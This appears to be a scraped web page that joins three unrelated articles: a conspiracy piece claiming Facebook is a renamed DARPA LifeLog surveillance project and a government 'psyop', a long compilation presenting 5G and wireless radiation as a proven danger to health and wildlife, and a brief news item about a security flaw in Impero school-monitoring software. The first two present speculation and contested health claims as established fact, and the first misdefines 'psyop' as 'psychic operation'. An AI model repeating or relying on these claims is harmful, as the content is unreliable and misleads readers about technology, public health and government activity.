Facebook is Likely Just the DARPA LifeLog Project Re-Named

Facebook is Likely Just the DARPA LifeLog Project Re-Named

These are tense times for the friendly folks at Facebook. Mark Zuckerberg, CEO of the social media dictatorship, has steered his multi-billion dollar corporation into the stormy seas of multiple civil courtroom battles over violating user rights.

There is no question that Facebook is guilty of numerous civil rights violations. The Cambridge Analytics scandal of 2018 caused Facebook shares (FB) to plummet. Subsequent scandals have created a continuous decline in the company’s shareholder value.

But that doesn’t seem to matter to a company which seems to be fueled by higher sources, perhaps related to the federal surveillance state.

CORRECT, they don’t care.
Millie Weaver – Shadowgate Documentary Exposes This as an intentional ‘Ploy’ to restructure data sharing

In a video dated March 9, 2019, PeterOfEngland spoke out in an earnest warning about “the criminal behavior of Facebook, its data collection network, and its working with the United States government – the Pentagon initially – to begin what’s called an ontological data collection point on what’s called ‘designated targets.’”

We the People of the World are the designated targets who were selected by the U.S. government, the CIA, and the Pentagon, according to Peter.

Was it a mere coincidence that on the very same day that Facebook launched – February 4, 2004 – a Pentagon civilian spy project called LifeLog shut down?

The U.S. Defense Advanced Research Projects Agency (DARPA) Pentagon-sponsored Project LifeLog was set up to collect data on all individuals. DARPA functions as the Defense Department’s research branch and is responsible for spending oodles of legally unaccountable taxpayer dollars to conduct Black Operations, secret from public scrutiny.

The data our government was interested in was – and still is – “every conceivable and imaginable platform possible,” said Peter.

LifeLog is “an ontology-based (sub)system that captures, stores, and makes accessible the flow of one person’s experience in and interactions with the world in order to support a broad spectrum of associates/assistants and other system capabilities.”

LifeLog was designed to be an all-encompassing personal data vacuuming system “aimed to gather in a single place just about everything an individual says, sees or does: the phone calls made, the TV shows watched, the magazines read, the plane tickets bought, the e-mail sent and received.”

Why bother with this massive collection of individual citizen’s personal, professional, and social activities, you ask? “Out of this seemingly endless ocean of information, computer scientists would plot distinctive routes in the data, mapping relationships, memories, events and experiences.”

Back in 2004, civil rights activists immediately opposed the surveillance scheme, raising the red flag that LifeLog could be turned against Us the People and “become the ultimate tool for profiling potential enemies of the state.”

The U.S. government responded by shutting down Project LifeLog. Or did they? In February 2004, “Researchers close to the project say they’re not sure why it was dropped late last month. Darpa hasn’t provided an explanation for LifeLog’s quiet cancellation. ‘A change in priorities’ is the only rationale agency spokeswoman Jan Walker gave to Wired News.”

Observers such as PeterOfEngland wonder if LifeLog was replaced by Facebook, which, oddly enough, launched on February 4, 2004 – the very same day DARPA announced the termination of their public surveillance Project LifeLog.

The thinking here is that the determined masterminds at DARPA realized that people might not flock to divulge their personal information to a cold, hard-hearted government agency. But Facebook was warm and inviting: “Sign up for a free account and make Friends” – thumbs up!

The public did flock to Facebook. We were told, in 2004, that the social media platform was the brainchild of a couple of Harvard students (Mark Zuckerberg and Eduardo Saverin) who wanted a face-pic-based school directory to keep in touch with classmates and other associates. The “social networking service launched as FaceMash in July 2003, but later changing to TheFacebook on February 4, 2004.”

Just look at Facebook now! Some people post every intimate detail of their daily lives as well as vital information: name, address, phone, email, web address, family names, veterinarian’s name, etc.

Harvard students made up the initial test base, followed by “other colleges in the Boston area, the Ivy League, and gradually most universities in the United States and Canada, corporations, and by September 2006, to everyone with a valid email address along with an age requirement of being 13 and older.”

Facebook’s growth and social acceptance were nothing short of phenomenal. This makes perfect sense if Facebook is actually a government-sponsored psyop (psychic operation or mind control). It appears, more and more, that this is the case, as Facebook “Community Standards” are suppressing free speech about anything anti-establishmentarian.

Not surprisingly, other world governments and the NSA also got on board with the covert agenda to ease user-friendly Facebook into the role of Global Personal Information Gatherer.

But Facebook got sloppy about user privacy and security concerns and is now staring down the barrel of lawsuits brought by large numbers of angry users whose personal information was abused by the social media spy site.

Perhaps foreshadowing the fate of Facebook, on February 1, 2019, a federal judge in San Francisco ruled that Facebook can be sued for allowing users’ private data to fall into the hands of third-parties such as Cambridge Analytics.

U.S. District Judge Vince Chhabria ruled briefly that “The injury is the disclosure of private information.”

We couldn’t agree more. But will this flagrant violation of civil rights shutter Facebook for good? Only time will tell.

There is one way to shut down Facebook for good. What if they have a social media platform and nobody came?

5G Facts Breakdown – Independent Research

5G Facts Breakdown – Independent Research

5G is the term used to describe the next-generation of mobile networks beyond the 4G LTE mobile networks commonly used today. 5G is intended to be the technology that allows the Internet of Things (IOT) to exist and tie all internet connected devices together.

Click here for Facts About 5G What You Need To Know

Click here for Top Resources to Take Action on 5G

5G networks will include a combination of a range and variety of frequencies and modulations. Industry is developing exactly what 5G will be as the engineering specifics are still in development. For example, 4G “small cell” networks will be the backbone of 5G as new 5G antennas will soon be mounted on poles with current 4G antennas. The new cell phones and devices will have multiple antennas that can toggle and forth between these technologies. It is assumed that 5G networks will not become commercially available until 2020 but several cities are rolling out 5G as test areas now. Verizon and Sprint have announced “test cities” for 5G which include Sacramento, Washington DC, Atlanta, Dallas, Miami and New York.

A first glance at US government websites such as the CDC and EPA could lead you to believe that this radiation is safe. Yet over 240 scientists and doctors from 41 nations who have published research in the field have appealed to the United Nations calling for urgent action to reduce these ever growing wireless exposures and they wrote the FCC for a moratorium on the roll-out of 5G citing the serious risks that to human health and the environment.

Insurance White Papers classify the rollout of 5G and Smartcities as “High Risk.”

The 2019 Swiss Re Report 5G is rated as a “high impact” emerging risk affecting property and casualty claims in more than 3 years. “Off the leash – 5G mobile networks” (p. 29)….As the biological effects of EMF in general and 5G in particular are still being debated, potential claims for health impairments may come with a long latency. Read Insurance White Papers here.

Published peer reviewed science already indicates that the current wireless technologies of 2G, 3G and 4G – in use today with our cell phones, computers and wearable tech – creates radiofrequency exposures which poses a serious health risk to humans, animals and the environment. Scientists are cautioning that before rolling out 5G, research on human health effects urgently needs to be done first to ensure the public and environment are protected.

However, instead of prudent public health measures to ensure the public’s safety, governments such as the United States are quickly rolling out 5G networks in neighborhoods and are enacting various state and federal regulations to “streamline” and fasttrack the rollout. These regulations will end the ability of communities to halt and be a part of the decision making process in this massive 5G infrastructure buildout.

Wireless company documents clearly state that 5G will increase the levels of RF radiation in the vicinity of the antennas. Many countries such as China, India, Poland, Russia, Italy and Switzerland have far more protective and stricter radiation limits which will not allow the deployment of 5G as the increased 5G radiation would exceed their limits. These countries are creating roadblocks to the 5G rollout and industry has launched large scale efforts to loosen limits.

Industry is Deeply Involved in the Science

Investigate Europe Reports: 5G The Mass Experiment (Part 1) and How Much is Safe? Finances Effect Research (Part 2) This two part investigative report in 2019 covers the 5G rollout and the history of industry influenced research on EMFS.

“At least three studies over the years have documented that there is often a link between conclusions of studies and the source of the money that paid for the research. Science funded by industry is less likely to find health risks than studies paid for by institutions or authorities….Studies which are solely financed by industry are likely to be biased” – Investigate Europe, 2019

Investigative Europe identified a group of fourteen scientists who either helped create, or defend, the EMF exposure guidelines disseminated by ICNIRP, a non- governmental organization (NGO) based in Germany. ICNIRP’s self-selected members argue that the thousands of peer-reviewed studies that have found harmful biologic or health effects from chronic exposure to non-thermal levels of EMF are insufficient to warrant stronger safety guidelines. “The ICNIRP Cartel: Who’s Who in the EMF Research World,” an interactive graphic developed by Investigate Europe (German ICNIRP Cartel). Dr. Moskowitz PDF of ICNIRP Cartel

Watch the short video by Investigative Europe on 5G below.

Published Research Establishes Harmful Effects of Wireless Radiation

5G Wireless Expansion: Public Health and Environmental Implications is a published research review on 5G that documents the range of reported adverse effects of RF and millimeter waves—effects which range from cancer to bacteria growth changes to DNA damage. The study concludes that “a moratorium on the deployment of 5G is warranted” and “the addition of this added high frequency 5G radiation to an already complex mix of lower frequencies, will contribute to a negative public health outcome … from both physical and mental health perspectives” (Russell 2018).

Cancer epidemiology update, following the 2011 IARC evaluation of radiofrequency electromagnetic fields is a comprehensive research review of RF effects in human and animal research. The review concludes that scientific evidence is now adequate to conclude radiofrequency radiation is carcinogenic to humans (Miller 2018). Several previously published studies also concluded that RF can “cause” cancer, for example, Hardell 2017Atzman 2016 and Peleg 2018.

 

The US National Toxicology Program (NTP) Study on Cell Phone Radiation found “clear evidence” of cancer, heart damage and DNA damage in a $30-million study designed to test the basis for federal safety limits (NIEHS). The heart and brain cancers found in the NTP rats are the same cell type as tumors that researchers have found to be increased in humans who have used use cell phones for over 10 years. Thus, researchers say this animal evidence confirms the human evidence (Hardell 2019.)

The Ramazzini Institute (RI) Study on Base Station RF  was another large scale rat study that also found increases in the same heart cancers as the NTP study found—yet the Ramazzini rats were exposed to much lower levels of RF than the NTP rats. In fact, all the RI Ramazzini radiation exposures were below FCC limits, as the study was specifically designed to test the safety of RF limits for cell tower/base stations (Falconi 2018.)

 

Tumor promotion by exposure to radiofrequency electromagnetic fields below exposure limits for humans” is a replication study that used very, very low RF exposures (lower than the Ramazzini and NTP study) and combined the RF with a known carcinogen. Researchers found elevated lymphoma and significantly higher numbers of tumors in the lungs and livers in the animals exposed to both RF and the carcinogen, leading researchers to state that previous research (Tillman 2010) was confirmed and that “our results show that electromagnetic fields obviously enhance the growth of tumors” (Lerchl 2015).

The Human Skin as a Sub-THz Receiver – Does 5G Pose a Danger to It or Not? and “The Modeling of the Absorbance of Sub-THz Radiation by Human Skin are two papers by physicists presenting research that found higher 5G frequencies are intensely absorbed into human sweat ducts (in skin), at much higher absorption levels than other parts of our skin’s tissues (Betzalel 2017Betzalel 2018). The researchers conclude, “we are raising a warning flag against the unrestricted use of sub-THz technologies for communication, before the possible consequences for public health are explored.”

Exposure of Insects to Radio-Frequency Electromagnetic Fields from 2 to 120 GHz” published in Scientific Reports is the first study to investigate how insects (including the Western honeybee) absorb the higher frequencies (2 GHz to 120 GHz) to be used in the 4G/5G rollout. The scientific simulations showed increases in absorbed power between 3% to 370% when the insects were exposed to the frequencies. Researchers concluded, “This could lead to changes in insect behaviour, physiology, and morphology over time….”

 

Two recent papers that have investigated frequencies to be used in 5G have called out the need to reevaluate current guidelines due to the unique  way higher frequencies interact with human tissue. These studies are clear documentation of the reality that 5G technology is being rolled out before adequate research on human exposures. “Systematic Derivation of Safety Limits for Time-Varying 5G Radiofrequency Exposure Based on Analytical Models and Thermal Dose concludes that the “results also show that the peak-to-average ratio of 1,000 tolerated by the International Council on Non-Ionizing Radiation Protection guidelines may lead to permanent tissue damage after even short exposures, highlighting the importance of revisiting existing exposure guidelines.” “Human Exposure to RF Fields in 5G Downlink concludes “our results show that 5G downlink RF fields generate significantly higher power density (PD) and specific absorption rate (SAR) than a current cellular system. This paper also shows that SAR should also be taken into account for determining human RF exposure in the mmW downlink.”

“A review of the ecological effects of RF-EMF” reviewed 113 studies finding RF-EMF had a significant effect on birds, insects, other vertebrates, other organisms and plants in 70% of the studies (Cucurachi 2013). Development and reproduction in birds and insects were the most strongly affected. As an example of the several studies on wildlife impacts, a study focusing on RF from antennas found increased sperm abnormalities in mice exposed to RF from GSM antennas (Otitoloju 2010). Studies on bees have found behavioral effects (Kumar 2011Favre 2011), disrupted navigation Goldsworthy 2009Sainudeen 2011Kimmel et al. 2007) decreasing egg laying rate (Sharma and Kumar, 2010) and reduced colony strength (Sharma and Kumar, 2010Harst et al. 2006). Research has also found a high level of damage to trees from antenna radiation.  For example, a field monitoring study spanning 9 years involving over 100 trees (Waldmann-Selsam 2016) found trees sustained more damage on the side of the tree facing the antenna.

Towards 5G communication systems: Are there health implications?” is a research review that details how research has found that millimeter waves can alter gene expression, promote cellular proliferation and synthesis of proteins linked with oxidative stress, inflammatory and metabolic processes.” The researchers conclude, “available findings seem sufficient to demonstrate the existence of biomedical effects, to invoke the precautionary principle” (Di Ciaula 2018).  

Research on People Near Cell Towers Links Exposure to Adverse Effects

The Impact of radiofrequency radiation on DNA damage and antioxidants in peripheral blood lymphocytes of humans residing in the vicinity of mobile phone base station” is a research study that compared people living close (within 80 meters) and far (more than 300 meters away) from cellular antennas and found that the people living closer had several significant changes in their blood predictive of cancer development (Zothansiama 2017). Researchers controlled for various demographics, including the use of microwaves and wireless in the homes.   

 

Mortality by neoplasia and cellular telephone base stations” is a 10 year study by the Belo Horizonte Brazil Health Department and several universities in Brazil that found an elevated relative risk of cancer mortality at residential distances of 500 meters or less from cell installations (Dode 2011). Shortly after this study was published, the city prosecutor sued several cell phone companies and requested that almost half of the city’s antennas be removed. Many antennas were dismantled.

 

A 2019 study of students in schools near cell towers found their higher RF exposure was associated with impacts on motor skills, memory and attention (Meo 2019). Examples of other effects linked to cell towers in research studies include neuropsychiatric problemselevated diabetesheadachessleep problems and genetic damage. Such research continues to accumulate after the 2010 landmark review study on 56 studies that reported biological effects found at very low intensities, including impacts on reproduction, permeability of the blood-brain barrier, behavior, cellular and metabolic changes, and increases in cancer risk (Lai and Levitt 2010).  

Cellular Antennas Create Measurable Increases in Radiation in the Area

2018 article published in The Lancet Planetary Health points to unprecedented increasing RF exposures (Bandara and Carpenter 2018). Another key finding from Zothansiama 2017 was that homes closer to antennas had measurably higher radiation levels—adding to the documentation that antennas increase RF levels. An Australian study also found that children in kindergartens with nearby antenna installations had nearly three-and-a-half times higher RF exposures than children with installations further away (more than 300 meters (Bhatt 2016).  

 

A 2018 multi-country study that measured RF in several countries found that cell phone tower radiation is the dominant contributor to RF exposure in most outdoor areas exposure in urban areas was higher and that exposure has drastically increased. As an example, the measurements the researchers tool in Los Angeles, USA were 70 times higher than the US EPA estimate 40 years ago.

Click for “Facts About 5G” What You Need To Know 
THOUSANDS OF MINI CELL TOWERS TO BE BUILT IN FRONT OF HOMES

5G will require the buildout of literally hundreds of thousands of new wireless antennas in neighborhoods, cities and towns. A cellular small cell or other transmitter will be placed every two to ten homes according to estimates. The purpose of this massive infrastructure build out of small cells, distributed antennae systems and microcells is to increase range and capacity in populated urban areas and prepare for the future 5G rollout. 5G frequencies will utilize higher frequencies that do not travel as far as the lower frequencies.

US state and federal governments are moving forth regulations which would make the right of way in front of homes as available sites for 5G transmitters – without consent of the property owners. In response, communities are protesting en mass as they do not want these transmitters built in front of their homes and communities want to be able to regulate the placement on right of ways.  Some municipalities are taking the case to the courts with litigation.

5G WILL USE HIGHER ELECTROMAGNETIC FREQUENCIES

5G will utilize multiple frequencies from those currently in use for cell phones and wireless to higher millimeter frequencies.

Today’s cellular and Wi-Fi networks rely on microwaves – a type of electromagnetic radiation utilizing frequencies up to 6 gigahertz (GHz) in order to wirelessly transmit voice or data. However, 5G applications will require unlocking of new spectrum bands in higher frequency ranges above 6 GHz to 100 GHz and beyond, utilizing submillimeter and millimeter waves – to allow ultra-high rates of data to be transmitted in the same amount of time as compared with previous deployments of microwave radiation. Each carrier will use a different set of frequencies.

What is the difference between 1G, 2G, 3G and 4G and 5G ?

  • 1G = analog
  • 2G = digital, voice
    • Examples include GSM, D-AMPS, PDC
    • Data, but only as analog modem (using the whole channel) at 9.6Kbps
    • 2.5G added dedicated digital data (GPRS)
    • 2.75G faster data (EDGE)
    • Data rates from 9.6Kbps (GSM) to 33Kbps (GPRS) 200Kbps or higher(2.75G)
  • 3G = digital, supported data, but still circuit switched
    • UMTS / WCDMA, EvDO
    • Includes data but still onto circuit switched architecture
    • 3.5G faster data, added true always-on / packet data (HSPA)
    • Data rates of 2Mbps to tens of Mbps
  •  4G = wireless broadband
    • OFDMA, flat architecture, true packet switched
    • Pure data: voice as VoIP (VoLTE)
    • LTE & WiMAX
    • Data rates of tens of Mbps to hundreds of Mbps

Read more at https://www.lifewire.com/mobile-networking-explained-817468

MLLIMETER AND SUBMILLIMETER WAVES ARE BIOLOGICALLY ACTIVE

Current investigations of wireless frequencies in the millimeter and submillimeter range confirm that these waves interact directly with human skin, specifically the sweat glands. Dr. Ben-Ishai of the Department of Physics, Hebrew University, Israel recently detailed how human sweat ducts act like an array of helical antennas when exposed to these wavelengths.

MECHANISM OF ACTION IS PROVEN

Research already indicates serious adverse effects from the wireless modalities in use today. Research studies from the Dielectric Spectroscopy Laboratory of the Department of Applied Physics, Hebrew University of Jerusalem, headed by Dr. Yuri Feldman, indicate that 5Gs millimeter and submillimeter waves will uniquely interact with human skin and  lead to preferential layer absorption. The number of sweat ducts within human skin varies from two million to four million.  Replicated peer research of these biological effects in laboratory research has been conducted internationally  and scientists consider this mechanism of action well proven (See documentation further down on this webpage).

5G FREQUENCIES ARE USED IN WEAPONS

For years, the U.S., Russian and Chinese defense agencies have been developing weapons that rely on the capability of this electromagnetic frequency range to induce unpleasant burning sensations on the skin as a form of crowd control. Millimeter waves are utilized by the U.S. Army in crowd dispersal guns called Active Denial Systems. Dr. Paul Ben-Ishai pointed to research that was commissioned by the U.S. Army to find out why people ran away when the beam touched them. “If you are unlucky enough to be standing there when it hits you, you will feel like your body is on fire.” The U.S. Department of Defense explains how “The sensation dissipates when the target moves out of the beam. The sensation is intense enough to cause a nearly instantaneous reflex action of the target to flee the beam.”

HUMAN SKIN WILL BE CLASSIFIED AS AN EXTREMITY ALLOWING HIGHER EXPOSURES

Our skin is our largest organ. Dariusz Leszczynski, PhD, Chief Editor of Radiation and Health has  stated that  the International Commission on Non-Ionizing Radiation Protection usually referred to as ICNIRP – is  developing recommendations for public exposure limits of these higher frequencies is planning to classify all the skin in the human body as belonging to the limbs rather than to the head or torso. Leszczynski cautioned that, “If you classify skin as limbs – no matter where the skin is – you are permitted to expose it more than otherwise.”

We assume that in terms of US exposure limits this means that the skin will be classified as “an extremity”. Extremities are allowed to be exposed to much higher radiation levels than the brain, torso, legs and arms. In the USA extremities -in regards to wireless radiation- are specifically wrists and hands, ankles and feet and the ear.

 

5G DEPLOYMENT WITHOUT HEALTH EFFECT EVALUATION

5G is being developed and implemented without adequate evaluation of the effect of this technology on human health after long term exposure to these frequencies. Peer reviewed research studies have found adverse effects from the electromagnetic  frequencies currently in use and that will be in use for this new technology.

There are no studies that have evaluated the impact of long term exposure to 5G technology on human health. None. We are the experiment.

“There is an urgent need to evaluate 5G health effects now before millions are exposed. We need to know if 5G increases the risk of skin diseases such as melanoma or other skin cancers,” stated Ron Melnick, the National Institutes of Health scientist, now retired, who led the design of the National Toxicology Program study on cell phone radiofrequency radiation.

Click here for “Facts About 5G” What You Need To Know 

Click here for Top Resources to Take Act

In Dr. Cindy Russell’s A 5G Wireless Future: Will it give us a smart nation or contribute to an unhealthy one (Text PDF), published in the the Santa Clara Medical Association, Russell states that “3G, 4G, 5G or a combination of zapping frequencies giving us immersive connection and entertainment but at a potentially steep price.” Russell details the scientific documentation on 5G’s frequencies which include arrhythmias, heart rate variability, bacterial affects, antibiotic resistance, immune system affects, chromatin affects, teratogenic effects, altered gene expression and cataracts.

Dr. Cindy Russell lists specific recommendations shared by Environmental Health Trust and scientists worldwide.

RECOMMENDATIONS TO PROTECT PUBLIC HEALTH

  1. Do not proceed to roll out 5G technologies pending pre-market studies on health effects.
  2. Reevaluate safety standards based on long term as well as short term studies on biological effects.
  3. Rescind a portion of Section 704 of the Telecommunications Act of 1996 which preempts state and local government regulation for the placement, construction, and modification of personal wireless service facilities on the basis of the environmental effects.
  4. Rescind portions of The Spectrum Act which was passed in 2012 as part of the Middle Class Tax Relief and Job Creation Act, which strips the ability city officials and local governments to regulate cellular communications equipment, provides no public notification or opportunity for public input and may potentially result in environmental impacts.
  5. Create an independent multidisciplinary scientific agency tasked with developing appropriate safety regulations, premarket testing and research needs in a transparent environment with public input.
  6. Label pertinent EMF information on devices along with appropriate precautionary warnings.
RESOURCES

Click here for EHT’s Scientific FactSheets On 5G

Want to read more? Click for “Facts About 5G” What You Need To Know 

Scientific analyses show industry funding can and does influence research on radiofrequency radiation.

Potential Risks to Human Health Originating from Future Sub-MM Communication Systems

 

Expert Forum Lecture at the Israel Institute for Advanced Study at Hebrew University Medical School, January 24, 2017

Watch a lecture on submillimeter and millimeter frequencies by Paul Ben-Ishai, PhD of the Department of Physics, Ariel University, Israel, Full Bio and Yuri Feldman, PhD, Head of the Dielectric Spectroscopy Laboratory, Department of Applied Physics, Hebrew University of Jerusalem, Full Bio. Click here for a PDF of Abstract for this Presentation

NEWS

Is 5G technology dangerous? Early data shows a slight increase of tumors in male rats exposed to cellphone radiation, Jim Puzzanghera, Los Angeles Times, Aug 8, 2016

A 5G Wireless Future: Will it give us a smart nation or contribute to an unhealthy one, Dr. Cindy Russell, Santa Clara Medical Association Bulletin Jan/Feb 2017 (Page 20 to 23) (Text only PDF)

The Internet of Things Poses Human Health Risks: Scientists Question the Safety of Untested 5G Technology at International Conference, Environmental Health Trust Press Release 3/9/2017

Everything You Need to Know About 5G IEEE article

RESOURCES FOR THE COMMUNITY

 

Click here for EHT’s Scientific FactSheets On 5G

Why We Should Oppose 5G on Health Grounds, by Dr. Ronald Powell

WHAT ARE 5G AND THE INTERNET OF THINGS? Website: http://whatis5g.info/ This website considers all the issues surrounding 5G and the man ways 5G and the IoT will harm  humans, the environment, and our Earth from cybersecurity to conflict minerals to health.

Citizens’ Cell Tower 5G Information Packet of Montgomery County: This slide presentation contains key details for communities addressing small cells in their neighborhood.

RECENT 5G and MILLIMETER WAVE BIOEFFECT STUDIES

Click here to see the latest science on 5G millimeter waves. 

This compilation has included several papers compiled from Dr. Joel Moskowitz on his blog SaferEMR, from work presented at the Israel Institute for Advanced Studies at Hebrew University and from the Environmental Health Research Team.

 

Russell CL. 5G wireless telecommunications expansion: Public health and environmental implications. Environmental Research. Available online 11 April 2018. in press.  

  • “On the horizon, a new generation of even shorter high frequency 5G wavelengths is being proposed to power the Internet of Things (IoT).”
  • “It is argued that the addition of this added high frequency 5G radiation to an already complex mix of lower frequencies, will contribute to a negative public health outcome both from both physical and mental health perspectives.”
  • “Like other common toxic exposures, the effects of radiofrequency electromagnetic radiation (RF EMR) will be problematic if not impossible to sort out epidemiologically as there no longer remains an unexposed control group. This is especially important considering these effects are likely magnified by synergistic toxic exposures and other common health risk behaviors. Effects can also be non-linear. Because this is the first generation to have cradle-to-grave lifespan exposure to this level of man-made microwave (RF EMR) radiofrequencies, it will be years or decades before the true health consequences are known. Precaution in the roll out of this new technology is strongly indicated.”
  • “Current radiofrequency radiation wavelengths we are exposed to appear to act as a toxin to biological systems. A moratorium on the deployment of 5G is warranted, along with development of independent health and environmental advisory boards that include independent scientists who research biological effects and exposure levels of radiofrequency radiation. Sound regulatory policy regarding current and future telecommunications initiative will require more careful assessment of risks to human health, environmental health, public safety, privacy, security and social consequences. Public health regulations need to be updated to match appropriate independent science with the adoption of biologically based exposure standards prior to further deployment of 4G or 5G technology.”

Betzalel N, Ben Ishai P, Feldman Y., The human skin as a sub-THz receiver – Does 5G pose a danger to it or not? Environ Res. 2018 May;163:208-216. doi: 10.1016/j.envres.2018.01.032. Epub 2018 Feb 22.

  • Experimentally we showed that the reflectance of the human skin in the sub-THz region depends on the intensity of perspiration, i.e. sweat duct’s conductivity, and correlates with levels of human stress (physical, mental and emotional). Later on, we detected circular dichroism in the reflectance from the skin, a signature of the axial mode of a helical antenna. The full ramifications of what these findings represent in the human condition are still unclear. We also revealed correlation of electrocardiography (ECG) parameters to the sub-THz reflection coefficient of human skin. In a recent work, we developed a unique simulation tool of human skin, taking into account the skin multi-layer structure together with the helical segment of the sweat duct embedded in it. The presence of the sweat duct led to a high specific absorption rate (SAR) of the skin in extremely high frequency band. In this paper, we summarize the physical evidence for this phenomenon and consider its implication for the future exploitation of the electromagnetic spectrum by wireless communication. Starting from July 2016 the US Federal Communications Commission (FCC) has adopted new rules for wireless broadband operations above 24 GHz (5 G). This trend of exploitation is predicted to expand to higher frequencies in the sub-THz region. One must consider the implications of human immersion in the electromagnetic noise, caused by devices working at the very same frequencies as those, to which the sweat duct (as a helical antenna) is most attuned. We are raising a warning flag against the unrestricted use of sub-THz technologies for communication, before the possible consequences for public health are explored.

Nasim I, Kim S. Human Exposure to RF Fields in 5G Downlink. Submitted on 10 Nov 2017 to IEEE International Communications Conference.  

  • Our results show that 5G downlink RF fields generate significantly higher power density (PD) and specific absorption rate (SAR) than a current cellular system. This paper also shows that SAR should also be taken into account for determining human RF exposure in the mmW downlink.

TRIPATHI et al., Frequency of the resonance of the human sweat duct in a normal mode of operation, BIOMEDICAL OPTICS EXPRESS 130,  Vol. 9, No. 3 | 1 March 2018

  • This result indicates that careful consideration should be given while designing electronic and photonic devices operating in the sub-terahertz frequency region in order to avoid various effects on human health due to these waves.

 

Betzalel, Y. Feldman, and P. Ben Ishai, “The Modeling of the Absorbance of Sub-THz Radiation by Human Skin,” IEEE Trans. THz Sci. Tech. (Paris) 7(5), 521–528 (2017).

  • In 2008, we demonstrated that the coiled portion of the sweat duct in upper skin layer could be regarded as a helical antenna in the sub-THz band. The full ramifications of what these findings represent in the human condition are still very unclear, but it is obvious that the absorption of electromagnetic energy is governed by the topology for the skin and its organelles, especially the sweat duct.

Di CiaulaTowards 5G communication systems: Are there health implications?Int J Hyg Environ Health. 2018 Feb 2.

  • “Preliminary observations showed that MMW increase skin temperature, alter gene expression, promote cellular proliferation and synthesis of proteins linked with oxidative stress, inflammatory and metabolic processes, could generate ocular damages, affect neuro-muscular dynamics.”
  • “Further studies are needed to better and independently explore the health effects of RF-EMF in general and of MMW in particular. However, available findings seem sufficient to demonstrate the existence of biomedical effects, to invoke the precautionary principle, to define exposed subjects as potentially vulnerable and to revise existing limits.

Scientific Citations from the published study “Potential Risks to Human Health Originating from Future Sub-MM Communication Systems”  by Paul Ben-Ishai, PhD and Yuri Feldman, PhD

Feldman, Yuri and Paul Ben-Ishai. “Potential Risks to Human Health Originating from Future Sub-MM Communication Systems.” Abstract, 2017.

Feldman, Yuri, et al. “Human skin as arrays of helical antennas in the millimeter and submillimeter wave range.” Physical Review Letters, vol. 100, no. 12, 2008.

Hayut, Itai, et al. “Circular polarization induced by the three-dimensional chiral structure of human sweat ducts.” Physical Review, vol. 89, no. 4, 2014.

Hayut, Itai, et al. “The Helical Structure of Sweat Ducts: Their Influence on the Electromagnetic Reflection Spectrum of the Skin.” IEEE Transactions on Terahertz Science and Technology, vol. 3, no. 2, 2013, pp.  207-15.

Professor Yuri Feldman – Research Study Summaries, The Hebrew University of Jerusalem Department of Applied Physics, Dielectric Spectroscopy Laboratory

RESEARCH ON MILLIMETER WAVES

Haas AJ, et al. “Effect of acute millimeter wave exposure on dopamine metabolism of NGF-treated PC12 cells.” Journal of Radiation Research, 2017.

Gandhi OP, Riazi A. Absorption of millimeter waves by human beings and its biological implications. IEEE Transactions on Microwave Theory and Techniques, vol. 34, no. 2, 1986, pp. 228-235.

Haas AJ, et al. “Effects of 60-GHz millimeter waves on neurite outgrowth in PC12 cells using high-content screening.” Neuroscience Letters, vol. 618, 2016, pp. 58-65.

Le Dréan Y, et al. “State of knowledge on biological effects at 40–60 GHz.” Comptes Rendus Physique, vol. 14, no. 5, 2013, pp. 402-411.

Sivachenko IB, et al. “Effects of Millimeter-Wave Electromagnetic Radiation on the Experimental Model of Migraine.” Bulletin of Experimental Biology and Medicine, vol. 160, no. 4, 2016, pp. 425-8.

Soghomonyan D, K. Trchounian and A. Trchounian. “Millimeter waves or extremely high frequency electromagnetic fields in the environment: what are their effects on bacteria?” Applied Microbiology and Biotechnology, vol. 100, no. 11, 2016, pp. 4761-71.

Ramundo-Orlando A.  Effects of millimeter waves radiation on cell membrane – A brief review. Journal of Infrared Millimeter Terahertz Waves, vol. 30, no. 12, 2010, pp. 1400-1411.

REFERENCES ON DEFENSE USE OF MILLIMETER WAVES

US Department of Defense Non-Lethal Weapons Program FAQS

A Narrative Summary and Independent Assessment of the Active Denial System The Human Effects Advisory Panel

SUBMISSIONS TO THE FCC ON SPECTRUM FRONTIERS

On July 14, 2016, the FCC voted to approve Spectrum Frontiers, making the U.S. the first country in the world to open up higher-frequency millimeter wave spectrum for the development of 5G fifth-generation wireless cellular technology. The FCC was flooded with comments in opposition to 5G. Read full details at the EHT website on Spectrum Frontiers

The Berkshire-Litchfield Environmental Council Comments to Thomas Wheeler, Chairman, Federal Communications Commission

“Federally-protected wildlife species are in danger”, Briefing Memorandum from Dr. Albert Manville

July 20, 2016 – Dr. Joel Moskowitz Comment to the FCC, “FCC Open Letter Calls for Moratorium on New Commercial Applications of Radiofrequency Radiation”

Dr. Yael Steins Comments to the FCC in Opposition to 5G Spectrum Frontiers Millimeter Wave Technology

Dr. Ronald M. Powell Ph.D. Comment to the FCC

Dr. Devra Davis to FCC, “Long Term Health and Safety Evaluation Needed Before Introduction of 5G”

Comments to FCC by Electrical Pollution, “Parents Write to the FCC: Be on the Right Side of History”

Submission to FCC by Susan Clark, “Stop 5G harm to all living beings: The Science is Conclusive”

Maryland Smartmeter Awareness Comment to the FCC, “FCC Proposed Move to 5G”

Comments by Dafna Tachover and “We are the Evidence” to FCC, “Those Injured by Wireless ask Congress: Please Protect us and help protect the public’s health. Say STOP to the FCC and wheeler in 5G vote”

Angela Tsiang to US Senate Committee on Commerce, Science, and Transportation

SPECTRUM FRONTIERS RESOURCES

July 14, 2016 FCC Meeting Video Spectrum Frontiers vote.

TV Technology: FCC Opens Higher Frequencies to Phone Companies

Public News Service: FCC Votes Today on Opening Additional Wireless Spectrum for 5G

Regulators Pave Way For Speedy Next-Generation 5G Networks

GSMA ANALYSIS Understanding 5G: Perspectives on future technological advancements in mobile

VIDEOS and MORE at the Original SOURCE
Schools Now Monitoring kids with Insecure Impero Software, PR Issues Abound

Schools Now Monitoring kids with Insecure Impero Software, PR Issues Abound

One of the most widely used tools for Schools monitoring kids and restricting pupils’ internet use in UK schools has a serious security flaw which could leave hundreds of thousands of children’s personal information exposed to hackers, a researcher has warned.

Impero Education Pro, a product that restricts and monitors’ students’ website use and searches, is used in 27% of UK secondary schools, according to the company. In a controversial pilot programme, a version of the software looks for extremism-related searches such as “jihadi bride”.

But last month the security researcher Zammis Clark posted extensive details of a flaw in the company’s encryption protocols which could allow almost anyone to gain full access to computers running the Impero software, run software such as spyware on the systems, or access files and records stored on them.

The company said it had released a temporary security patch and was working on a permanent upgrade.

